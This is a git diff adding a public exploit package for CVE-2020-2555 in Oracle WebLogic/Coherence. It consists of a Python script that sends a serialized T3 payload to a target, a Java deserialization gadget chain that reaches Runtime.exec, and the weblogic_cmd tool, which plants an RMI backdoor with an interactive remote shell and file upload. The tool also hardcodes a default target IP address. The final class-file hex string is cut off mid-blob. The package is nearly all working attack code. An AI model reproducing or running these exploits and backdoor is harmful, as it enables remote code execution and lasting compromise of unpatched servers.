diff --git a/cve/Oracle/2020/CVE-2020-2555/.keep b/cve/Oracle/2020/CVE-2020-2555/.keep new file mode 100644 index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391 diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/CVE-2020-2555.png b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/CVE-2020-2555.png new file mode 100644 index 0000000000000000000000000000000000000000..6fb0ad4b8c1d8810bec09a0c93da8695ce7e63cd Binary files /dev/null and b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/CVE-2020-2555.png differ diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/CVE-2020-2555.py b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/CVE-2020-2555.py new file mode 100644 index 0000000000000000000000000000000000000000..611c682868a9de2d6c582d788fb2d02358032e94 --- /dev/null +++ b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/CVE-2020-2555.py @@ -0,0 +1,36 @@ +import socket +import os +import sys +import struct + +if len(sys.argv) < 3: + print 'Usage: python %s ' % os.path.basename(sys.argv[0]) + sys.exit() + +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +sock.settimeout(5) + +server_address = (sys.argv[1], int(sys.argv[2])) +print '[+] Connecting to %s port %s' % server_address +sock.connect(server_address) + +# Send headers +headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n' +print 'sending "%s"' % headers +sock.sendall(headers) + +data = sock.recv(1024) +print >>sys.stderr, 'received "%s"' % data + +payloadObj = open(sys.argv[3],'rb').read() + +payload='\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' +payload=payload+payloadObj +payload=payload+'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78' + +payload=struct.pack('>I',len(payload)) + payload[4:] + +print '[+] Sending payload...' +sock.send(payload) +data = sock.recv(1024) +print >>sys.stderr, 'received "%s"' % data \ No newline at end of file diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/README.md b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/README.md new file mode 100644 index 0000000000000000000000000000000000000000..a778480fdb4744e16d1c182181c60d206d069a96 --- /dev/null +++ b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/README.md @@ -0,0 +1,11 @@ +# CVE-2020-2555 + +http://1984-0day.com + +https://www.youtube.com/watch?v=VzmZTYbm4Zw + +``` +python CVE-2020-2555.py ip port test.ser +``` + +![png](https://github.com/wsfengfan/CVE-2020-2555/blob/master/CVE-2020-2555.png) diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/CVE_2020_2555.java b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/CVE_2020_2555.java new file mode 100644 index 0000000000000000000000000000000000000000..1ba6f2cd743583ae3050ad65286a033362a43f9a --- /dev/null +++ b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/CVE_2020_2555.java @@ -0,0 +1,119 @@ +package com.supeream; + +// com.supeream from https://github.com/5up3rc/weblogic_cmd/ + +import com.supeream.serial.Serializables; +import com.supeream.weblogic.T3ProtocolOperation; +import com.tangosol.util.extractor.ChainedExtractor; +import com.tangosol.util.extractor.ReflectionExtractor; +import com.tangosol.util.filter.LimitFilter; + +import javax.management.BadAttributeValueExpException; +import java.io.FileInputStream; +import java.io.FileOutputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.lang.reflect.Field; + +// com.tangosol.util.extractor.ChainedExtractor from coherence.jar + + +/* + * author:Y4er.com + * + * gadget: + * BadAttributeValueExpException.readObject() + * com.tangosol.util.filter.LimitFilter.toString() + * com.tangosol.util.extractor.ChainedExtractor.extract() + * com.tangosol.util.extractor.ReflectionExtractor.extract() + * Method.invoke() + * ... + * Runtime.getRuntime.exec() + */ + +public class CVE_2020_2555 { + + public static void main(String[] args) throws Exception { + // Runtime.class.getRuntime() + ReflectionExtractor extractor1 = new ReflectionExtractor( + "getMethod", + new Object[]{"getRuntime", new Class[0]} + + ); + + // get invoke() to execute exec() + ReflectionExtractor extractor2 = new ReflectionExtractor( + "invoke", + new Object[]{null, new Object[0]} + + ); + + // invoke("exec","calc") + ReflectionExtractor extractor3 = new ReflectionExtractor( + "exec", + new Object[]{new String[]{"cmd","/c","calc"}} + + ); + + ReflectionExtractor[] extractors = { + extractor1, + extractor2, + extractor3, + }; + + ChainedExtractor chainedExtractor = new ChainedExtractor(extractors); + LimitFilter limitFilter = new LimitFilter(); + + //m_comparator + Field m_comparator = limitFilter.getClass().getDeclaredField("m_comparator"); + m_comparator.setAccessible(true); + m_comparator.set(limitFilter, chainedExtractor); + + + //m_oAnchorTop + Field m_oAnchorTop = limitFilter.getClass().getDeclaredField("m_oAnchorTop"); + m_oAnchorTop.setAccessible(true); + m_oAnchorTop.set(limitFilter, Runtime.class); + + // BadAttributeValueExpException toString() + // This only works in JDK 8u76 and WITHOUT a security manager + // https://github.com/JetBrains/jdk8u_jdk/commit/af2361ee2878302012214299036b3a8b4ed36974#diff-f89b1641c408b60efe29ee513b3d22ffR70 + BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null); + Field field = badAttributeValueExpException.getClass().getDeclaredField("val"); + field.setAccessible(true); + field.set(badAttributeValueExpException, limitFilter); + + // serialize + byte[] payload = Serializables.serialize(badAttributeValueExpException); + + // T3 send, you can also use python script. + System.out.print(payload); + //T3ProtocolOperation.send("127.0.0.1", "7001", payload); + + // test + serialize(badAttributeValueExpException); + deserialize(); + + } + + public static void serialize(Object obj) { + try { + ObjectOutputStream os = new ObjectOutputStream(new FileOutputStream("test.ser")); + os.writeObject(obj); + os.close(); + } catch (Exception e) { + e.printStackTrace(); + } + } + + public static void deserialize() { + try { + ObjectInputStream is = new ObjectInputStream(new FileInputStream("test.ser")); + is.readObject(); + } catch (Exception e) { + e.printStackTrace(); + } + } +} + + diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/Main.java b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/Main.java new file mode 100644 index 0000000000000000000000000000000000000000..1dd9124a50b504cebee6187228af1a3bd0903f5f --- /dev/null +++ b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/Main.java @@ -0,0 +1,235 @@ +package com.supeream; + +import com.supeream.serial.BytesOperation; +import com.supeream.ssl.WeblogicTrustManager; +import com.supeream.weblogic.WebLogicOperation; +import org.apache.commons.cli.*; +import weblogic.cluster.singleton.ClusterMasterRemote; +import weblogic.jndi.Environment; +import weblogic.utils.encoders.BASE64Encoder; + +import javax.naming.Context; +import javax.naming.NamingException; +import java.io.FileNotFoundException; +import java.util.ArrayList; +import java.util.Arrays; +import java.util.List; +import java.util.Scanner; + + +public class Main { + + public static final String JNDI_FACTORY = "weblogic.jndi.WLInitialContextFactory"; + public static String TYPE = "streamMessageImpl"; + public static List types = Arrays.asList(new String[]{"marshall", "collection", "streamMessageImpl"}); + public static String version; + public static CommandLine cmdLine; + private static String cmd = "whoami"; + + + public static Context getInitialContext(String url) throws NamingException, FileNotFoundException { + Environment environment = new Environment(); + environment.setProviderUrl(url); + environment.setEnableServerAffinity(false); + environment.setSSLClientTrustManager(new WeblogicTrustManager()); + return environment.getInitialContext(); + } + + public static boolean checkIsAlreadyInstalled(String host, String port) { + try { + System.out.println("检查是否安装rmi实例"); + Context initialContext = getInitialContext(converUrl(host, port)); + ClusterMasterRemote remoteCode = (ClusterMasterRemote) initialContext.lookup("supeream"); + System.out.println("rmi已经安装"); + invokeRmi(remoteCode); + return true; + } catch (Exception e) { + if (e.getMessage() !=null && e.getMessage().contains("supeream")) { + System.out.println("rmi实例不存在"); + } else { + e.printStackTrace(); +// System.exit(0); + } + } + + return false; + } + + public static void executeBlind(String host, String port) throws Exception { + + if (cmdLine.hasOption("B") && cmdLine.hasOption("C")) { + System.out.println("执行命令:" + cmdLine.getOptionValue("C")); + WebLogicOperation.blindExecute(host, port, cmdLine.getOptionValue("C")); + System.out.println("执行blind命令完成"); + System.exit(0); + } + + } + + public static String converUrl(String host, String port) { + if (cmdLine.hasOption("https")) { + return "t3s://" + host + ":" + port; + } else { + return "t3://" + host + ":" + port; + } + } + + private static String cdConcat(List cds) { + StringBuffer stringBuffer = new StringBuffer(); + for (String cd: cds) { + stringBuffer.append(cd); + stringBuffer.append("&&"); + } + return stringBuffer.toString(); + } + + public static void invokeRmi(ClusterMasterRemote remoteCode) throws Exception { + String result = null; + + if (Main.cmdLine.hasOption("shell")) { + Scanner scanner = new Scanner(System.in); + List cacheCmds = new ArrayList(); + + while (true) { + System.out.print("please input cmd:>"); + cmd = scanner.nextLine(); + if (cmd.equalsIgnoreCase("exit")) { + System.exit(0); + } + if (cmd.startsWith("cd ")) { + cacheCmds.add(cmd); + } + + if (cmd.equalsIgnoreCase("clear")) { + cacheCmds.clear(); + continue; + } + + if (cmd.equalsIgnoreCase("back")) { + cacheCmds.remove(cacheCmds.size()-1); + continue; + } + + String newCmd = cdConcat(cacheCmds); + + if (!cmd.startsWith("cd ")) { + newCmd += cmd; + } else if (newCmd.length()>3){ + newCmd = newCmd.substring(0, newCmd.length()-2); + } + + + if (Main.cmdLine.hasOption("noExecPath")) { + result = remoteCode.getServerLocation("showmecode$NO$"+newCmd); + } else { + result = remoteCode.getServerLocation("showmecode"+newCmd); + } + + System.out.println(result); + } + } else { + System.out.println("执行命令:" + cmd); + + if (Main.cmdLine.hasOption("noExecPath")) { + result = remoteCode.getServerLocation("showmecode$NO$"+cmd); + } else { + result = remoteCode.getServerLocation("showmecode"+cmd); + } + System.out.println(result); + } + } + + public static void main(String[] args) { + + System.setProperty("weblogic.security.allowCryptoJDefaultJCEVerification", "true"); + System.setProperty("weblogic.security.allowCryptoJDefaultPRNG", "true"); + System.setProperty("weblogic.security.SSL.ignoreHostnameVerification", "true"); + System.setProperty("weblogic.security.TrustKeyStore", "DemoTrust"); + + Options options = new Options(); + options.addOption("H", true, "Remote Host[need set]"); + options.addOption("P", true, "Remote Port[need set]"); + options.addOption("C", true, "Execute Command[need set]"); + options.addOption("T", true, "Payload Type" + types); + options.addOption("U", false, "Uninstall rmi"); + options.addOption("B", false, "Runtime Blind Execute Command maybe you should select os type"); + options.addOption("os", true, "Os Type [windows,linux]"); + options.addOption("https", false, "enable https or tls"); + options.addOption("shell", false, "enable shell module"); + options.addOption("upload", false, "enable upload a file"); + options.addOption("src", true, "path to src file "); + options.addOption("dst", true, "path to dst file "); + options.addOption("noExecPath", false, "custom execute path"); + + try { + + String host = "202.60.207.169"; + String port = "7001"; + CommandLineParser parser = new DefaultParser(); + cmdLine = parser.parse(options, args); + + if (cmdLine.hasOption("H")) { + host = cmdLine.getOptionValue("H"); + } else { + HelpFormatter formatter = new HelpFormatter(); + formatter.printHelp("supeream", options); + System.exit(0); + } + + if (cmdLine.hasOption("P")) { + port = cmdLine.getOptionValue("P"); + } + + if (cmdLine.hasOption("C")) { + cmd = cmdLine.getOptionValue("C"); + } + + if (cmdLine.hasOption("T")) { + TYPE = cmdLine.getOptionValue("T"); + } + + if (cmdLine.hasOption("U")) { + System.out.println("开始删除rmi实例"); + WebLogicOperation.unInstallRmi(host, port); + System.out.println("后门删除实例"); + System.exit(0); + } + + executeBlind(host, port); + + if (Main.cmdLine.hasOption("upload") && Main.cmdLine.hasOption("src") && Main.cmdLine.hasOption("dst")) { + System.out.println("开始上传文件"); + String path = Main.cmdLine.getOptionValue("src"); + byte[] fileContent = BytesOperation.GetByteByFile(path); + WebLogicOperation.uploadFile(host, port, Main.cmdLine.getOptionValue("dst"), fileContent); + System.out.println("file upload success"); + System.exit(0); + } + + if (checkIsAlreadyInstalled(host, port)) { + System.exit(0); + } + + System.out.println("开始安装rmi实例"); + WebLogicOperation.installRmi(host, port); + System.out.println("等待rmi实例安装成功 "); + Thread.sleep(2000); + + Context initialContext = getInitialContext(converUrl(host, port)); + ClusterMasterRemote remoteCode = (ClusterMasterRemote) initialContext.lookup("supeream"); + invokeRmi(remoteCode); + + } catch (Exception e) { + System.out.println("实例安装失败"); + String msg = e.getMessage(); + if (msg != null && msg.contains("Unrecognized option")) { + HelpFormatter formatter = new HelpFormatter(); + formatter.printHelp("supeream", options); + } else { + System.out.println("实例rmi安装失败 请切换-OB模式"); + e.printStackTrace(); + } + } + + } +} diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/payload/PayloadTest.java b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/payload/PayloadTest.java new file mode 100644 index 0000000000000000000000000000000000000000..7642b8862cd17e03b6a84bc18795317aa4bfe13e --- /dev/null +++ b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/payload/PayloadTest.java @@ -0,0 +1,22 @@ +package com.supeream.payload; + +import com.supeream.serial.BytesOperation; +import sun.org.mozilla.javascript.internal.DefiningClassLoader; + +/** + * Created by nike on 17/7/3. + */ +public class PayloadTest { + public static void main(String[] args) throws Exception { +// byte[] iRemoteCode = BytesOperation.GetByteByFile("/Users/nike/IdeaProjects/weblogic_cmd/out/production/weblogic_cmd/com/supeream/payload/IRemote.class"); +// System.out.println(BytesOperation.bytesToHexString(iRemoteCode)); + DefiningClassLoader definingClassLoader = new DefiningClassLoader(); +// Class cls = definingClassLoader.defineClass("com.supeream.payload.IRemote",iRemoteCode); + byte[] remoteCodeImpl = BytesOperation.GetByteByFile("/Users/nike/IdeaProjects/weblogic_cmd/out/production/weblogic_cmd/com/supeream/payload/RemoteImpl.class"); + System.out.println(BytesOperation.bytesToHexString(remoteCodeImpl)); + + Class cls_ = definingClassLoader.defineClass("com.supeream.payload.RemoteImpl", remoteCodeImpl); + Class.forName("com.supeream.payload.RemoteImpl"); + System.out.println(cls_); + } +} diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/payload/RemoteImpl.java b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/payload/RemoteImpl.java new file mode 100644 index 0000000000000000000000000000000000000000..2d377292fce3dcfc60988058c645fad08c896dc8 --- /dev/null +++ b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/payload/RemoteImpl.java @@ -0,0 +1,108 @@ +package com.supeream.payload; + +import sun.tools.asm.TryData; +import weblogic.cluster.singleton.ClusterMasterRemote; +import weblogic.utils.encoders.BASE64Decoder; + +import javax.naming.Context; +import javax.naming.InitialContext; +import java.io.BufferedReader; +import java.io.FileOutputStream; +import java.io.InputStreamReader; +import java.rmi.RemoteException; +import java.util.ArrayList; +import java.util.Arrays; +import java.util.List; + +/** + * Created by nike on 17/6/27. + */ + +public class RemoteImpl implements ClusterMasterRemote { + + public static void main(String[] args) { + + try { + RemoteImpl remote = new RemoteImpl(); + + if (args.length == 2 && args[0].equalsIgnoreCase("blind")) { + remote.getServerLocation(args[1]); + } else if (args.length == 1) { + Context ctx = new InitialContext(); + if (args[0].equalsIgnoreCase("install")) { + ctx.rebind("supeream", remote); + } else if (args[0].equalsIgnoreCase("uninstall")) { + ctx.unbind("supeream"); + } + } + } catch (Exception e) { + + } + } + + + @Override + public void setServerLocation(String cmd, String args) throws RemoteException { + + } + + public static void uploadFile(String path, byte[] content) { + try { + FileOutputStream fileOutputStream = new FileOutputStream(path); + fileOutputStream.write(content); + fileOutputStream.flush(); + fileOutputStream.close(); + }catch (Exception e) { + + } + } + + + @Override + public String getServerLocation(String cmd) throws RemoteException { + try { + + if (!cmd.startsWith("showmecode")) { + return "guess me?"; + } else { + cmd = cmd.substring(10); + } + + boolean isLinux = true; + String osTyp = System.getProperty("os.name"); + if (osTyp != null && osTyp.toLowerCase().contains("win")) { + isLinux = false; + } + + List cmds = new ArrayList(); + + if (cmd.startsWith("$NO$")) { + cmds.add(cmd.substring(4)); + }else if (isLinux) { + cmds.add("/bin/bash"); + cmds.add("-c"); + cmds.add(cmd); + } else { + cmds.add("cmd.exe"); + cmds.add("/c"); + cmds.add(cmd); + } + + ProcessBuilder processBuilder = new ProcessBuilder(cmds); + processBuilder.redirectErrorStream(true); + Process proc = processBuilder.start(); + + BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream())); + StringBuffer sb = new StringBuffer(); + + String line; + while ((line = br.readLine()) != null) { + sb.append(line).append("\n"); + } + + return sb.toString(); + } catch (Exception e) { + return e.getMessage(); + } + } +} diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/serial/BytesOperation.java b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/serial/BytesOperation.java new file mode 100644 index 0000000000000000000000000000000000000000..784e416c545ad1b829f209e8fbabbc8554c5086c --- /dev/null +++ b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/serial/BytesOperation.java @@ -0,0 +1,75 @@ +package com.supeream.serial; + +// +// Source code recreated from a .class file by IntelliJ IDEA +// (powered by Fernflower decompiler) +// + +import java.io.FileInputStream; + +public class BytesOperation { + + + public static byte[] hexStringToBytes(String hexString) { + if (hexString != null && !hexString.equals("")) { + hexString = hexString.toUpperCase(); + int length = hexString.length() / 2; + char[] hexChars = hexString.toCharArray(); + byte[] d = new byte[length]; + + for (int i = 0; i < length; ++i) { + int pos = i * 2; + d[i] = (byte) (charToByte(hexChars[pos]) << 4 | charToByte(hexChars[pos + 1])); + } + + return d; + } else { + return null; + } + } + + private static byte charToByte(char c) { + return (byte) "0123456789ABCDEF".indexOf(c); + } + + public static byte[] byteMerger(byte[] byte_1, byte[] byte_2) { + byte[] byte_3 = new byte[byte_1.length + byte_2.length]; + System.arraycopy(byte_1, 0, byte_3, 0, byte_1.length); + System.arraycopy(byte_2, 0, byte_3, byte_1.length, byte_2.length); + return byte_3; + } + + public static String bytesToHexString(byte[] src) { + StringBuilder stringBuilder = new StringBuilder(""); + if (src == null || src.length <= 0) { + return null; + } + for (int i = 0; i < src.length; i++) { + int v = src[i] & 0xFF; + String hv = Integer.toHexString(v); + if (hv.length() < 2) { + stringBuilder.append(0); + } + stringBuilder.append(hv); + } + return stringBuilder.toString(); + } + + public static byte[] GetByteByFile(String FilePath) throws Exception { + FileInputStream fi = new FileInputStream(FilePath); + byte[] temp = new byte[50000000]; + int length = fi.read(temp); + byte[] file = new byte[length]; + + for (int i = 0; i < length; ++i) { + file[i] = temp[i]; + } + + fi.close(); + return file; + } + + public static void main(String[] args) throws Exception { + System.out.println(BytesOperation.bytesToHexString(BytesOperation.GetByteByFile("/Users/nike/IdeaProjects/weblogic_cmd/lib/remote.jar"))); + } +} diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/serial/Reflections.java b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/serial/Reflections.java new file mode 100644 index 0000000000000000000000000000000000000000..81bcbf30cb18066e69b8281bc41502810812b289 --- /dev/null +++ b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/serial/Reflections.java @@ -0,0 +1,33 @@ +package com.supeream.serial; + +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; + +public class Reflections { + + public static Field getField(final Class clazz, final String fieldName) throws Exception { + Field field = clazz.getDeclaredField(fieldName); + if (field == null && clazz.getSuperclass() != null) { + field = getField(clazz.getSuperclass(), fieldName); + } + field.setAccessible(true); + return field; + } + + public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception { + final Field field = getField(obj.getClass(), fieldName); + field.set(obj, value); + } + + public static Object getFieldValue(final Object obj, final String fieldName) throws Exception { + final Field field = getField(obj.getClass(), fieldName); + return field.get(obj); + } + + public static Constructor getFirstCtor(final String name) throws Exception { + final Constructor ctor = Class.forName(name).getDeclaredConstructors()[0]; + ctor.setAccessible(true); + return ctor; + } + +} diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/serial/SerialDataGenerator.java b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/serial/SerialDataGenerator.java new file mode 100644 index 0000000000000000000000000000000000000000..8e03f2f1aceb4ef2a49068aff6855d957a93af05 --- /dev/null +++ b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/serial/SerialDataGenerator.java @@ -0,0 +1,102 @@ +package com.supeream.serial; + +import com.supeream.weblogic.BypassPayloadSelector; +import org.apache.commons.collections.Transformer; +import org.apache.commons.collections.functors.ChainedTransformer; +import org.apache.commons.collections.functors.ConstantTransformer; +import org.apache.commons.collections.functors.InvokerTransformer; +import org.apache.commons.collections.map.LazyMap; +import org.mozilla.classfile.DefiningClassLoader; + +import java.lang.reflect.InvocationHandler; +import java.lang.reflect.Proxy; +import java.util.HashMap; +import java.util.HashSet; +import java.util.Map; + +/** + * Created by nike on 17/7/3. + */ +public class SerialDataGenerator { + + private static final String REMOTE = "com.supeream.payload.RemoteImpl"; + private static final String remoteHex = "cafebabe0000003200d10a003500720700730a000200720800740a007500760a000200770700780a0007007208007908007a0b007b007c08007d0b007b007e07007f0700800a000f00810a000f00820a000f00830a000f00840800850a007500860800870a007500880800890a008a008b0a0075008c08008d0a0075008e07008f0a001d00720800900b009100920800930800940800950800960700970a002500980a002500990a0025009a07009b07009c0a009d009e0a002a009f0a002900a00700a10a002e00720a002900a20a002e00a30800a40a002e00a50a000e00a60700a70700a80100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100214c636f6d2f737570657265616d2f7061796c6f61642f52656d6f7465496d706c3b0100046d61696e010016285b4c6a6176612f6c616e672f537472696e673b29560100036374780100164c6a617661782f6e616d696e672f436f6e746578743b01000672656d6f7465010001650100154c6a6176612f6c616e672f457863657074696f6e3b010004617267730100135b4c6a6176612f6c616e672f537472696e673b01000d537461636b4d61705461626c650700730700a907007f0100117365745365727665724c6f636174696f6e010027284c6a6176612f6c616e672f537472696e673b4c6a6176612f6c616e672f537472696e673b2956010003636d640100124c6a6176612f6c616e672f537472696e673b01000a457863657074696f6e730700aa01000a75706c6f616446696c65010017284c6a6176612f6c616e672f537472696e673b5b42295601001066696c654f757470757453747265616d01001a4c6a6176612f696f2f46696c654f757470757453747265616d3b01000470617468010007636f6e74656e740100025b420100116765745365727665724c6f636174696f6e010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000769734c696e75780100015a0100056f7354797